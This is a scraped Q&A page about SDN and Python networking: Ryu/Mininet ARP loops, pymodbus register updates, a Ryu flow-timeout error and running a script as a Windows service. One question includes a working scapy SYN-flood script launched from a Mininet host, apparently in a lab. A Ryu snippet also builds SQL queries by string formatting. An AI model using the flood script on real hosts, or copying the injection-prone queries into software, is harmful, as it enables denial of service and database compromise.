RYU Controller with ARP Loop (Python API Mininet) - python

TOpology Loop
I have a problem with the ARP loop. I have attached my python API code and the Simple_Swicth.py code that I used. As you can see the picture, I cannot able to ping h1 to h2. can able to help?
Here is my topology code:
#!/usr/bin/python
from mininet.node import Controller, RemoteController, OVSController
from mininet.net import Mininet
from mininet.node import OVSKernelSwitch, UserSwitch
from mininet.cli import CLI
from mininet.link import TCLink, Intf
from mininet.log import setLogLevel, info
def Topo1():
net = Mininet(controller=RemoteController, switch=OVSKernelSwitch)
info('*** Adding controll\n')
c0 = net.addController(name='c0', controller=RemoteController, ip='127.0.0.1', protocol='tcp', port=6633)
info('*** Add host\n')
h1 = net.addHost('h1')
h2 = net.addHost('h2')
info('*** Add switches\n')
s1 = net.addSwitch('s1')
s2 = net.addSwitch('s2')
s3 = net.addSwitch('s3')
s4 = net.addSwitch('s4')
s5 = net.addSwitch('s5')
s1.linkTo( h1 )
s1.linkTo( s2 )
s2.linkTo( s3 )
s2.linkTo( s4 )
s3.linkTo( s4 )
s4.linkTo( s5 )
s5.linkTo( h2 )
net.build()
c0.start
info('***Starting switches\n')
net.get('s1').start([c0])
net.get('s2').start([c0])
net.get('s3').start([c0])
net.get('s4').start([c0])
net.get('s5').start([c0])
info('***Post configure switches and hosts\n')
net.start()
net.pingAll()
CLI(net)
net.stop()
if __name__ == '__main__':
setLogLevel('info')
Topo1()
here is the simple_switch code for ryu remote controller. Does anyone know which part of the simple_Switch code that I need add extra code to manage ARP loop. And since I do not really good at it don you mind to let me know what kind of code should I use?
from ryu.base import app_manager
from ryu.controller import ofp_event
from ryu.controller.handler import CONFIG_DISPATCHER, MAIN_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.ofproto import ofproto_v1_3
from ryu.lib.packet import packet
from ryu.lib.packet import ethernet
from ryu.lib.packet import ether_types
class SimpleSwitch13(app_manager.RyuApp):
OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]
def __init__(self, *args, **kwargs):
super(SimpleSwitch13, self).__init__(*args, **kwargs)
self.mac_to_port = {}
#set_ev_cls(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER)
def switch_features_handler(self, ev):
datapath = ev.msg.datapath
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
# install table-miss flow entry
#
# We specify NO BUFFER to max_len of the output action due to
# OVS bug. At this moment, if we specify a lesser number, e.g.,
# 128, OVS will send Packet-In with invalid buffer_id and
# truncated packet data. In that case, we cannot output packets
# correctly. The bug has been fixed in OVS v2.1.0.
match = parser.OFPMatch()
actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER,
ofproto.OFPCML_NO_BUFFER)]
self.add_flow(datapath, 0, match, actions)
def add_flow(self, datapath, priority, match, actions, buffer_id=None):
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,
actions)]
if buffer_id:
mod = parser.OFPFlowMod(datapath=datapath, buffer_id=buffer_id,
priority=priority, match=match,
instructions=inst)
else:
mod = parser.OFPFlowMod(datapath=datapath, priority=priority,
match=match, instructions=inst)
datapath.send_msg(mod)
#set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _packet_in_handler(self, ev):
# If you hit this you might want to increase
# the "miss_send_length" of your switch
if ev.msg.msg_len < ev.msg.total_len:
self.logger.debug("packet truncated: only %s of %s bytes",
ev.msg.msg_len, ev.msg.total_len)
msg = ev.msg
datapath = msg.datapath
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
in_port = msg.match['in_port']
pkt = packet.Packet(msg.data)
eth = pkt.get_protocols(ethernet.ethernet)[0]
if eth.ethertype == ether_types.ETH_TYPE_LLDP:
# ignore lldp packet
return
dst = eth.dst
src = eth.src
dpid = datapath.id
self.mac_to_port.setdefault(dpid, {})
self.logger.info("packet in %s %s %s %s", dpid, src, dst, in_port)
# learn a mac address to avoid FLOOD next time.
self.mac_to_port[dpid][src] = in_port
if dst in self.mac_to_port[dpid]:
out_port = self.mac_to_port[dpid][dst]
else:
out_port = ofproto.OFPP_FLOOD
actions = [parser.OFPActionOutput(out_port)]
# install a flow to avoid packet_in next time
if out_port != ofproto.OFPP_FLOOD:
match = parser.OFPMatch(in_port=in_port, eth_dst=dst)
# verify if we have a valid buffer_id, if yes avoid to send both
# flow_mod & packet_out
if msg.buffer_id != ofproto.OFP_NO_BUFFER:
self.add_flow(datapath, 1, match, actions, msg.buffer_id)
return
else:
self.add_flow(datapath, 1, match, actions)
data = None
if msg.buffer_id == ofproto.OFP_NO_BUFFER:
data = msg.data
out = parser.OFPPacketOut(datapath=datapath, buffer_id=msg.buffer_id,
in_port=in_port, actions=actions, data=data)
datapath.send_msg(out)

Related

pymodbus: update context of running server

I have a running ModbusRTU server, following this example.
I know how to update the context, but I can't update the context of a running server.
When I update the context in the run_updating_server() function (before StartSerialServer()) then it works fine.
But when I try to update the running context by calling updating_writer(context) then it doesn't update.
Also calling my own function 'getUpdatedContext()' from withing updating_writer() does not work:
def updating_writer(a):
a =(getContext(),)
""" A worker process that runs every so often and
updates live values of the context. It should be noted
that there is a race condition for the update.
:param arguments: The input arguments to the call
"""
log.debug("updating the context")
context = a[0]
register = 3
slave_id = 0x41
address = 0x10
values = context[slave_id].getValues(register, address, count=5)
values = [v + 1 for v in values]
log.debug("new values: " + str(values))
context[slave_id].setValues(register, address, values)
getContext():
def getContext():
store = ModbusSlaveContext(
di=ModbusSequentialDataBlock(0, [17]*100),
co=ModbusSequentialDataBlock(0, [17]*100),
hr=ModbusSequentialDataBlock(0, [17]*100),
ir=ModbusSequentialDataBlock(0, [17]*100))
store.setValues(5, 1, [0])
context = ModbusServerContext(slaves=store, single=True)
return context
my full code:
#!/usr/bin/env python
import os
import sys
"""
Pymodbus Server With Updating Thread
--------------------------------------------------------------------------
This is an example of having a background thread updating the
context while the server is operating. This can also be done with
a python thread::
from threading import Thread
thread = Thread(target=updating_writer, args=(context,))
thread.start()
"""
# --------------------------------------------------------------------------- #
# import the modbus libraries we need
# --------------------------------------------------------------------------- #
from pymodbus.server.asynchronous import StartSerialServer
from pymodbus.device import ModbusDeviceIdentification
from pymodbus.datastore import ModbusSequentialDataBlock
from pymodbus.datastore import ModbusSlaveContext, ModbusServerContext
from pymodbus.transaction import ModbusRtuFramer, ModbusAsciiFramer
# --------------------------------------------------------------------------- #
# import the twisted libraries we need
# --------------------------------------------------------------------------- #
from twisted.internet.task import LoopingCall
# --------------------------------------------------------------------------- #
# configure the service logging
# --------------------------------------------------------------------------- #
import logging
logging.basicConfig()
log = logging.getLogger()
log.setLevel(logging.DEBUG)
# --------------------------------------------------------------------------- #
# define your callback process
# --------------------------------------------------------------------------- #
def updating_writer(a):
""" A worker process that runs every so often and
updates live values of the context. It should be noted
that there is a race condition for the update.
:param arguments: The input arguments to the call
"""
log.debug("updating the context")
context = a[0]
register = 3
slave_id = 0x41
address = 0x10
values = context[slave_id].getValues(register, address, count=5)
values = [v + 1 for v in values]
log.debug("new values: " + str(values))
context[slave_id].setValues(register, address, values)
def run_updating_server():
# ----------------------------------------------------------------------- #
# initialize your data store
# ----------------------------------------------------------------------- #
store = ModbusSlaveContext(
di=ModbusSequentialDataBlock(0, [17]*100),
co=ModbusSequentialDataBlock(0, [17]*100),
hr=ModbusSequentialDataBlock(0, [17]*100),
ir=ModbusSequentialDataBlock(0, [17]*100))
context = ModbusServerContext(slaves=store, single=True)
# ----------------------------------------------------------------------- #
# initialize the server information
# ----------------------------------------------------------------------- #
identity = ModbusDeviceIdentification()
identity.VendorName = 'pymodbus'
identity.ProductCode = 'PM'
identity.VendorUrl = 'http://github.com/bashwork/pymodbus/'
identity.ProductName = 'pymodbus Server'
identity.ModelName = 'pymodbus Server'
identity.MajorMinorRevision = '2.2.0'
# ----------------------------------------------------------------------- #
# run the server you want
# ----------------------------------------------------------------------- #
time = 5
loop = LoopingCall(f=updating_writer, a=(context,))
loop.start(time, now=False) # initially delay by time
log.debug("::: Starting Modbus RTU server :::")
# RTU:
StartSerialServer(context, framer=ModbusRtuFramer, identity=identity,
port='/dev/ttyUSB0',
timeout=2,
baudrate=115200,
parity='E',
bytesize=8,
stopbits=1)
def main():
pid = str(os.getpid())
filename = 'modbusUpdatingServer.pid'
pidfile = str(os.getcwd()) + '/' + filename
if os.path.isfile(pidfile):
print (filename + " already exists \n exiting")
sys.exit()
open(pidfile, 'w').write(pid)
try:
# run server
run_updating_server()
finally:
os.unlink(pidfile)
if __name__ == "__main__":
main()
I want to update the context from another python script, i tried:
calling updating_writer(a) from that 'other python script', where a = updatedContext.
calling getUpdatedContext(), from withing updating_writer(a), which is a function in 'that other python script' which returns the updatedContext
make the context global, add a function updateContext(a), call that function from another python script.
It all resulted in compiling code, but the context of the running server didn't get updated.
here the code from the 'other python script':
from pymodbus.datastore import ModbusSequentialDataBlock, ModbusSlaveContext, ModbusServerContext
from threading import Thread
import os
import subprocess
import sys
from modbusUpdatingServer import updating_writer, run_updating_server
def writeUpdatedContext():
store = ModbusSlaveContext(
di=ModbusSequentialDataBlock(0, [17]*100),
co=ModbusSequentialDataBlock(0, [17]*100),
hr=ModbusSequentialDataBlock(0, [17]*100),
ir=ModbusSequentialDataBlock(0, [17]*100))
store.setValues(5, 1, [0])
context = ModbusServerContext(slaves=store, single=True)
updating_writer(a=(context,)
def main():
choice = input("press x if you want to update the context")
if choice == 'x' or choice == 'X':
writeUpdatedContext()
if __name__ == "__main__":
main()
How am I supposed to interact with updating_writer?
What I want to achieve is my modbusRTU server running, and updating the context from another threat, so my modbus client(master) can read the registers I've filled.

How do assign holding registers in pymodbus?

I am making a modbus server on a Raspberry Pi Zero to send data to a Modbus Client/Data Logger. I am trying to use pymodbus but I am having trouble following the documentation and was wondering if someone could show me how to assign specific values to holding register? I am using the Synchronous Server Example as my starting point. I am fairly new to Python and really need to understand what is going on in this code/program so if I need to make changes I can. Any help would be appreciated.
#!/usr/bin/env python
"""
Pymodbus Synchronous Server Example
--------------------------------------------------------------------------
The synchronous server is implemented in pure python without any third
party libraries (unless you need to use the serial protocols which require
pyserial). This is helpful in constrained or old environments where using
twisted is just not feasible. What follows is an example of its use:
"""
# --------------------------------------------------------------------------- #
# import the various server implementations
# --------------------------------------------------------------------------- #
from pymodbus.server.sync import StartTcpServer
from pymodbus.server.sync import StartUdpServer
from pymodbus.server.sync import StartSerialServer
from pymodbus.device import ModbusDeviceIdentification
from pymodbus.datastore import ModbusSequentialDataBlock, ModbusSparseDataBlock
from pymodbus.datastore import ModbusSlaveContext, ModbusServerContext
from pymodbus.transaction import ModbusRtuFramer, ModbusBinaryFramer
# --------------------------------------------------------------------------- #
# configure the service logging
# --------------------------------------------------------------------------- #
import logging
FORMAT = ('%(asctime)-15s %(threadName)-15s'
' %(levelname)-8s %(module)-15s:%(lineno)-8s %(message)s')
logging.basicConfig(format=FORMAT)
log = logging.getLogger()
log.setLevel(logging.DEBUG)
def run_server():
# ----------------------------------------------------------------------- #
# initialize your data store
# ----------------------------------------------------------------------- #
# The datastores only respond to the addresses that they are initialized to
# Therefore, if you initialize a DataBlock to addresses of 0x00 to 0xFF, a
# request to 0x100 will respond with an invalid address exception. This is
# because many devices exhibit this kind of behavior (but not all)::
#
# block = ModbusSequentialDataBlock(0x00, [0]*0xff)
#
# Continuing, you can choose to use a sequential or a sparse DataBlock in
# your data context. The difference is that the sequential has no gaps in
# the data while the sparse can. Once again, there are devices that exhibit
# both forms of behavior::
#
# block = ModbusSparseDataBlock({0x00: 0, 0x05: 1})
# block = ModbusSequentialDataBlock(0x00, [0]*5)
#
# Alternately, you can use the factory methods to initialize the DataBlocks
# or simply do not pass them to have them initialized to 0x00 on the full
# address range::
#
# store = ModbusSlaveContext(di = ModbusSequentialDataBlock.create())
# store = ModbusSlaveContext()
#
# Finally, you are allowed to use the same DataBlock reference for every
# table or you may use a separate DataBlock for each table.
# This depends if you would like functions to be able to access and modify
# the same data or not::
#
# block = ModbusSequentialDataBlock(0x00, [0]*0xff)
# store = ModbusSlaveContext(di=block, co=block, hr=block, ir=block)
#
# The server then makes use of a server context that allows the server to
# respond with different slave contexts for different unit ids. By default
# it will return the same context for every unit id supplied (broadcast
# mode).
# However, this can be overloaded by setting the single flag to False and
# then supplying a dictionary of unit id to context mapping::
#
# slaves = {
# 0x01: ModbusSlaveContext(...),
# 0x02: ModbusSlaveContext(...),
# 0x03: ModbusSlaveContext(...),
# }
# context = ModbusServerContext(slaves=slaves, single=False)
#
# The slave context can also be initialized in zero_mode which means that a
# request to address(0-7) will map to the address (0-7). The default is
# False which is based on section 4.4 of the specification, so address(0-7)
# will map to (1-8)::
#
# store = ModbusSlaveContext(..., zero_mode=True)
# ----------------------------------------------------------------------- #
store = ModbusSlaveContext(
di=ModbusSequentialDataBlock(0, [17]*100),
co=ModbusSequentialDataBlock(0, [17]*100),
hr=ModbusSequentialDataBlock(0, [17]*100),
ir=ModbusSequentialDataBlock(0, [17]*100))
context = ModbusServerContext(slaves=store, single=True)
# ----------------------------------------------------------------------- #
# initialize the server information
# ----------------------------------------------------------------------- #
# If you don't set this or any fields, they are defaulted to empty strings.
# ----------------------------------------------------------------------- #
identity = ModbusDeviceIdentification()
identity.VendorName = 'Pymodbus'
identity.ProductCode = 'PM'
identity.VendorUrl = 'http://github.com/riptideio/pymodbus/'
identity.ProductName = 'Pymodbus Server'
identity.ModelName = 'Pymodbus Server'
identity.MajorMinorRevision = '1.5'
# ----------------------------------------------------------------------- #
# run the server you want
# ----------------------------------------------------------------------- #
# Tcp:
StartTcpServer(context, identity=identity, address=("localhost", 5020))
# TCP with different framer
# StartTcpServer(context, identity=identity,
# framer=ModbusRtuFramer, address=("0.0.0.0", 5020))
# Udp:
# StartUdpServer(context, identity=identity, address=("0.0.0.0", 5020))
# Ascii:
# StartSerialServer(context, identity=identity,
# port='/dev/ttyp0', timeout=1)
# RTU:
# StartSerialServer(context, framer=ModbusRtuFramer, identity=identity,
# port='/dev/ttyp0', timeout=.005, baudrate=9600)
# Binary
# StartSerialServer(context,
# identity=identity,
# framer=ModbusBinaryFramer,
# port='/dev/ttyp0',
# timeout=1)
if __name__ == "__main__":
run_server()
Looks like I am using the wrong server and should be using the callback server but I am still unsure how to assign data to a input/holding register that is read in by a local sensor/device. Here is the Code to the Call back Server:
#!/usr/bin/env python
"""
Pymodbus Server With Callbacks
--------------------------------------------------------------------------
This is an example of adding callbacks to a running modbus server
when a value is written to it. In order for this to work, it needs
a device-mapping file.
"""
# --------------------------------------------------------------------------- #
# import the modbus libraries we need
# --------------------------------------------------------------------------- #
from pymodbus.server.async import StartTcpServer
from pymodbus.device import ModbusDeviceIdentification
from pymodbus.datastore import ModbusSparseDataBlock
from pymodbus.datastore import ModbusSlaveContext, ModbusServerContext
from pymodbus.transaction import ModbusRtuFramer, ModbusAsciiFramer
# --------------------------------------------------------------------------- #
# import the python libraries we need
# --------------------------------------------------------------------------- #
from multiprocessing import Queue, Process
# --------------------------------------------------------------------------- #
# configure the service logging
# --------------------------------------------------------------------------- #
import logging
logging.basicConfig()
log = logging.getLogger()
log.setLevel(logging.DEBUG)
# --------------------------------------------------------------------------- #
# create your custom data block with callbacks
# --------------------------------------------------------------------------- #
class CallbackDataBlock(ModbusSparseDataBlock):
""" A datablock that stores the new value in memory
and passes the operation to a message queue for further
processing.
"""
def __init__(self, devices, queue):
"""
"""
self.devices = devices
self.queue = queue
values = {k: 0 for k in devices.keys()}
values[0xbeef] = len(values) # the number of devices
super(CallbackDataBlock, self).__init__(values)
def setValues(self, address, value):
""" Sets the requested values of the datastore
:param address: The starting address
:param values: The new values to be set
"""
super(CallbackDataBlock, self).setValues(address, value)
self.queue.put((self.devices.get(address, None), value))
# --------------------------------------------------------------------------- #
# define your callback process
# --------------------------------------------------------------------------- #
def rescale_value(value):
""" Rescale the input value from the range
of 0..100 to -3200..3200.
:param value: The input value to scale
:returns: The rescaled value
"""
s = 1 if value >= 50 else -1
c = value if value < 50 else (value - 50)
return s * (c * 64)
def device_writer(queue):
""" A worker process that processes new messages
from a queue to write to device outputs
:param queue: The queue to get new messages from
"""
while True:
device, value = queue.get()
scaled = rescale_value(value[0])
log.debug("Write(%s) = %s" % (device, value))
if not device: continue
# do any logic here to update your devices
# --------------------------------------------------------------------------- #
# initialize your device map
# --------------------------------------------------------------------------- #
def read_device_map(path):
""" A helper method to read the device
path to address mapping from file::
0x0001,/dev/device1
0x0002,/dev/device2
:param path: The path to the input file
:returns: The input mapping file
"""
devices = {}
with open(path, 'r') as stream:
for line in stream:
piece = line.strip().split(',')
devices[int(piece[0], 16)] = piece[1]
return devices
def run_callback_server():
# ----------------------------------------------------------------------- #
# initialize your data store
# ----------------------------------------------------------------------- #
queue = Queue()
devices = read_device_map("device-mapping")
block = CallbackDataBlock(devices, queue)
store = ModbusSlaveContext(di=block, co=block, hr=block, ir=block)
context = ModbusServerContext(slaves=store, single=True)
# ----------------------------------------------------------------------- #
# initialize the server information
# ----------------------------------------------------------------------- #
identity = ModbusDeviceIdentification()
identity.VendorName = 'pymodbus'
identity.ProductCode = 'PM'
identity.VendorUrl = 'http://github.com/bashwork/pymodbus/'
identity.ProductName = 'pymodbus Server'
identity.ModelName = 'pymodbus Server'
identity.MajorMinorRevision = '1.0'
# ----------------------------------------------------------------------- #
# run the server you want
# ----------------------------------------------------------------------- #
p = Process(target=device_writer, args=(queue,))
p.start()
StartTcpServer(context, identity=identity, address=("localhost", 5020))
if __name__ == "__main__":
run_callback_server()
Again any help is appreciated.
from pymodbus.client.sync import ModbusTcpClient
address = 2 #register address
value = 12 #new value
unitId = 1
host = "127.0.0.1"
port = 502
client = ModbusTcpClient(host, port)
client.connect()
client.write_register(address,value,unit=unitId)
There is 2 basic function code here(for read,write coils/holding registers): https://github.com/omergunal/Modbus-Web-Interface/blob/master/app.py

Ryu controller struct.error when adding a new table flow

I'm writing a Ryu a L4 swtich application and i am trying to do the following: when a TCP/UDP packet is identified the application checks in a local database to see if the packet parameters are from a known attacker (source IP, destination IP and destination port).
If the packet matches one logged in the attacker database a flow is added to the switch to drop the specific packet (this flow has a duration of 2 hours), if the packet doesn't match a flow is added to forward to a specific switch port (this flow has a duration of 5 minutes).
The problem is, when the controller sends the new flow to the switch/datapath i receive the following error:
SimpleSwitch13: Exception occurred during handler processing. Backtrace from offending handler [_packet_in_handler] servicing event [EventOFPPacketIn] follows.
Traceback (most recent call last):
File "/root/SecAPI/Code/lib/python3.5/site-packages/ryu/base/app_manager.py", line 290, in _event_loop
handler(ev)
File "/root/SecAPI/Flasks/Code/SDN/switchL3.py", line 237, in _packet_in_handler
self.add_security_flow(datapath, 1, match, actions)
File "/root/SecAPI/Flasks/Code/SDN/switchL3.py", line 109, in add_security_flow
datapath.send_msg(mod)
File "/root/SecAPI/Code/lib/python3.5/site-packages/ryu/controller/controller.py", line 423, in send_msg
msg.serialize()
File "/root/SecAPI/Code/lib/python3.5/site-packages/ryu/ofproto/ofproto_parser.py", line 270, in serialize
self._serialize_body()
File "/root/SecAPI/Code/lib/python3.5/site-packages/ryu/ofproto/ofproto_v1_3_parser.py", line 2738, in _serialize_body
self.out_group, self.flags)
File "/root/SecAPI/Code/lib/python3.5/site-packages/ryu/lib/pack_utils.py", line 25, in msg_pack_into
struct.pack_into(fmt, buf, offset, *args)
struct.error: 'H' format requires 0 <= number <= 65535
heres my full code:
from ryu.base import app_manager
from ryu.controller import ofp_event
from ryu.controller.handler import CONFIG_DISPATCHER, MAIN_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.ofproto import ofproto_v1_3
from ryu.lib.packet import packet
from ryu.lib.packet import ethernet
from ryu.lib.packet import ether_types
from ryu.lib.packet import ipv4
from ryu.lib.packet import tcp
from ryu.lib.packet import udp
from ryu.lib.packet import in_proto
import sqlite3
class SimpleSwitch13(app_manager.RyuApp):
OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]
def __init__(self, *args, **kwargs):
super(SimpleSwitch13, self).__init__(*args, **kwargs)
self.mac_to_port = {}
self.initial = True
self.security_alert = False
#set_ev_cls(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER)
def switch_features_handler(self, ev):
datapath = ev.msg.datapath
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
match = parser.OFPMatch()
self.initial = True
actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER,
ofproto.OFPCML_NO_BUFFER)]
self.add_flow(datapath, 0, match, actions)
self.initial = False
# Adds a flow into a specific datapath, with a hard_timeout of 5 minutes.
# Meaning that a certain packet flow ceases existing after 5 minutes.
def add_flow(self, datapath, priority, match, actions, buffer_id=None):
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,
actions)]
if buffer_id:
if self.initial == True:
mod = parser.OFPFlowMod(datapath=datapath, buffer_id=buffer_id,
priority=priority, match=match,
instructions=inst)
elif self.initial == False:
mod = parser.OFPFlowMod(datapath=datapath, buffer_id=buffer_id,
priority=priority, match=match,
instructions=inst,hard_timeout=300)
else:
if self.initial == True:
mod = parser.OFPFlowMod(datapath=datapath, priority=priority,
match=match, instructions=inst)
elif self.initial == False:
mod = parser.OFPFlowMod(datapath=datapath, priority=priority,
match=match, instructions=inst,
hard_timeout=300)
datapath.send_msg(mod)
# Adds a security flow into the controlled device, a secured flow differs from a normal
# flow in it's duration, a security flow has a duration of 2 hours.
def add_security_flow(self, datapath, priority, match, actions, buffer_id=None):
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
#inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,
# actions)]
inst = [parser.OFPInstructionActions(ofproto.OFPIT_CLEAR_ACTIONS, [])]
if buffer_id:
mod = parser.OFPFlowMod(datapath=datapath, buffer_id=buffer_id,
priority=priority,match=match,command=ofproto.OFPFC_ADD,
instructions=inst, hard_timeout=432000)
else:
mod = parser.OFPFlowMod(datapath=datapath, priority=priority,
match=match, instructions=inst, command=ofproto.OFPFC_ADD,
hard_timeout=432000)
datapath.send_msg(mod)
# Deletes a already existing flow that matches has a given packet match.
def del_flow(self, datapath, priority, match, actions, buffer_id=None):
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,
actions)]
if buffer_id:
mod = parser.OFPFlowMod(datapath=datapath,buffer_id=buffer_id,
priority=priority,match=match,instruction=inst,
command=ofproto.OFPFC_DELETE)
else:
mod = parser.OFPFlowMod(datapath=datapath, priority=priority,
match=match, instructions=inst,
command=ofproto.OFPFC_DELETE)
datapath.send_msg(mod)
#set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _packet_in_handler(self, ev):
# If you hit this you might want to increase
# the "miss_send_length" of your switch
if ev.msg.msg_len < ev.msg.total_len:
self.logger.debug("packet truncated: only %s of %s bytes",
ev.msg.msg_len, ev.msg.total_len)
msg = ev.msg
datapath = msg.datapath
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
in_port = msg.match['in_port']
pkt = packet.Packet(msg.data)
eth = pkt.get_protocols(ethernet.ethernet)[0]
if eth.ethertype == ether_types.ETH_TYPE_LLDP:
# ignore lldp packet
return
dst = eth.dst
src = eth.src
dpid = datapath.id
self.mac_to_port.setdefault(dpid, {})
self.logger.info("packet in %s %s %s %s", dpid, src, dst, in_port)
# learn a mac address to avoid FLOOD next time.
self.mac_to_port[dpid][src] = in_port
if dst in self.mac_to_port[dpid]:
out_port = self.mac_to_port[dpid][dst]
else:
out_port = ofproto.OFPP_FLOOD
actions = [parser.OFPActionOutput(out_port)]
# install a flow to avoid packet_in next time
if out_port != ofproto.OFPP_FLOOD:
#match = parser.OFPMatch(in_port=in_port, eth_dst=dst, eth_src=src)
# check IP Protocol and create a match for IP
if eth.ethertype == ether_types.ETH_TYPE_IP:
conn = sqlite3.connect("database/sdnDatabase.db")
cursor = conn.cursor()
ip = pkt.get_protocol(ipv4.ipv4)
srcip = ip.src
dstip = ip.dst
#match = parser.OFPMatch(eth_type=ether_types.ETH_TYPE_IP,ipv4_src=srcip,ipv4_dst=dstip)
protocol = ip.proto
# ICMP Protocol
if protocol == in_proto.IPPROTO_ICMP:
print("WARN - We have a ICMP packet")
cursor.execute('select id from knownAttackers where srcaddr = \"{0}\" and dstaddr = \"{1}\" and protocol = "icmp";'.format(srcip, dstip))
result = cursor.fetchall()
match = parser.OFPMatch(eth_type=ether_types.ETH_TYPE_IP, ipv4_src=srcip, ipv4_dst=dstip,
ip_proto=protocol)
if len(result) == 0:
self.security_alert = False
else:
self.security_alert = True
# TCP Protocol
elif protocol == in_proto.IPPROTO_TCP:
print("WARN - We have a TCP packet")
t = pkt.get_protocol(tcp.tcp)
cursor.execute('select id from knownAttackers where srcaddr = \"{0}\" and dstaddr = \"{1}\" and dstport = \"{2}\" and protocol = "tcp";'.format(srcip, dstip, t.dst_port))
result = cursor.fetchall()
match = parser.OFPMatch(eth_type=ether_types.ETH_TYPE_IP, ipv4_src=srcip, ipv4_dst=dstip,
ip_proto=protocol, tcp_dst=t.dst_port)
if len(result) == 0:
self.security_alert = False
else:
print("We have a register in the database for this specific packet: {0}".format(result))
self.security_alert = True
# UDP Protocol
elif protocol == in_proto.IPPROTO_UDP:
print("WARN - We have a UDP packet")
u = pkt.get_protocol(udp.udp)
cursor.execute('select id from knownAttackers where srcaddr = \"{0}\" and dstaddr = \"{1}\" and dstport = \"{2}\" and protocol = "udp";'.format(srcip, dstip, u.dst_port))
result = cursor.fetchall()
match = parser.OFPMatch(eth_type=ether_types.ETH_TYPE_IP, ipv4_src=srcip, ipv4_dst=dstip,
ip_proto=protocol, udp_dst=u.dst_port)
if len(result) == 0:
self.security_alert = False
else:
self.security_alert = True
else:
self.security_alert = False
match = parser.OFPMatch(in_port=in_port, eth_dst=dst, eth_src=src)
# verify if we have a valid buffer_id, if yes avoid to send both
# flow_mod & packet_out
if self.security_alert == False:
if msg.buffer_id != ofproto.OFP_NO_BUFFER:
self.add_flow(datapath, 1, match, actions, msg.buffer_id)
return
else:
self.add_flow(datapath, 1, match, actions)
elif self.security_alert == True:
if msg.buffer_id != ofproto.OFP_NO_BUFFER:
self.add_security_flow(datapath, 1, match, actions, msg.buffer_id)
return
else:
self.add_security_flow(datapath, 1, match, actions)
data = None
if msg.buffer_id == ofproto.OFP_NO_BUFFER:
data = msg.data
if self.security_alert == False:
out = parser.OFPPacketOut(datapath=datapath, buffer_id=msg.buffer_id,
in_port=in_port, actions=actions, data=data)
datapath.send_msg(out)
the above error appears in the end of the add_security_flow() class method when i try to make a TCP connection that is identified as a known attacker, when he tries to send the flow modification (datapath.send_msg(mod)) to the switch/datapath.
What am i doing wrong? Am i'm missing some sort of variable?
In the Ryu controller mailing list a user named IWAMOTO told me that my hard_timeout values was too large for the struct packing (2 hours is 7200 seconds, i dont know where my head was for me to find 432000 haha), after downsizing the hard_timeout to 7200 seconds everything worked out just fine.
Always check the size of the values you're trying to send to a datapath, see if it doesn't exceed 65535.

Run a python script in Command Line and send argument to it

I used following python script to create a custom topology in mininet using sudo Python My_topology.py :
from mininet.topo import Topo
from mininet.node import Node
from mininet.net import Mininet
from mininet.cli import CLI
from mininet.node import RemoteController
import os
import sys
logging.getLogger().setLevel(logging.INFO)
class MyTopo (Topo):
def __init__(self, ipBase='10.0.0.0/8'):
Topo.__init__(self)
global host_list
# Add hosts and switches
s1 = self.addSwitch('s1')
for i in range(1, 21):
self.addHost('h%s'%i)
host_list.append('h%s'%i)
self.addLink('h%s'%i, s1)
def attack():
h1 = net.get('h1')
h1.cmd('sudo python .../My_SYNflood_attack.py')
topo = MyTopo()
net = Mininet(topo, controller=lambda name: RemoteController(name,
ip= '127.0.0.1', protocol= 'tcp', port= 6633), autoSetMacs= True)
net.start()
attack()
CLI(net)
net.stop()
As you see in attack function I used another .py script to send TCP packets from host h1 t another host. My_SYNflood_attack.py is as follow:
from scapy.all import *
import os
import sys
import random
import argparse
srcIP = '10.0.0.1'
dstIP = '10.0.0.10'
srcPort = 5555
dstPort = 4444
def randInt():
x = random.randint(1000,9000)
return x
def SYN_Flood(srcIP,dstIP,dstPort,counter):
total = 0
print("Packets are sending ...")
for x in range (0,counter):
s_port = randInt()
s_eq = randInt()
w_indow = randInt()
IP_Packet = IP ()
IP_Packet.src = srcIP
IP_Packet.dst = dstIP
TCP_Packet = TCP ()
TCP_Packet.sport = s_port
TCP_Packet.dport = dstPort
TCP_Packet.flags = "S"
TCP_Packet.seq = s_eq
TCP_Packet.window = w_indow
send(IP_Packet/TCP_Packet, verbose=0)
total+=1
sys.stdout.write("\nTotal packets sent: %i\n" % total)
def main():
SYN_Flood(srcIP, dstIP,dstPort,10)# 10 is number of packets
if __name__ == "__main__":
main()
So as you see in second script I set source and destination IP address statically, now I want to send source an destination IP address from first script and call My_SYNflood_attack.py in attack function like this: h1.cmd('sudo python .../My_SYNflood_attack.py 10.0.0.2 10.0.0.3')
How can I do it??
are you looking for something like this?
def attack():
h1 = net.get('h1')
h1.cmd('sudo python .../My_SYNflood_attack.py 10.0.0.2, 10.0.0.3')
and:
scrIP = sys.argv[1]
dstIP = sys.argv[2]
You can use to call another python script with arguments:
subprocess.call(['python', '.../My_SYNflood_attack.py.py', somescript_arg1, somescript_val1,...])

Run python Webserver as Windows service

I have server and console scripts which keeps on listening on port for console and server requests.
In UNIX environment I made both the server and console script as continuously running daemons which will keep them listening on port.
Is there any way way in windows to keep them running like daemon in UNIX ? I also want them to get up on reboot (should get auto started on reboot)
I read about windows services and followed code written here, but I am getting 404 error on my webpage
__version__ = "0.4"
__all__ = ["RequestHandler"]
import atexit
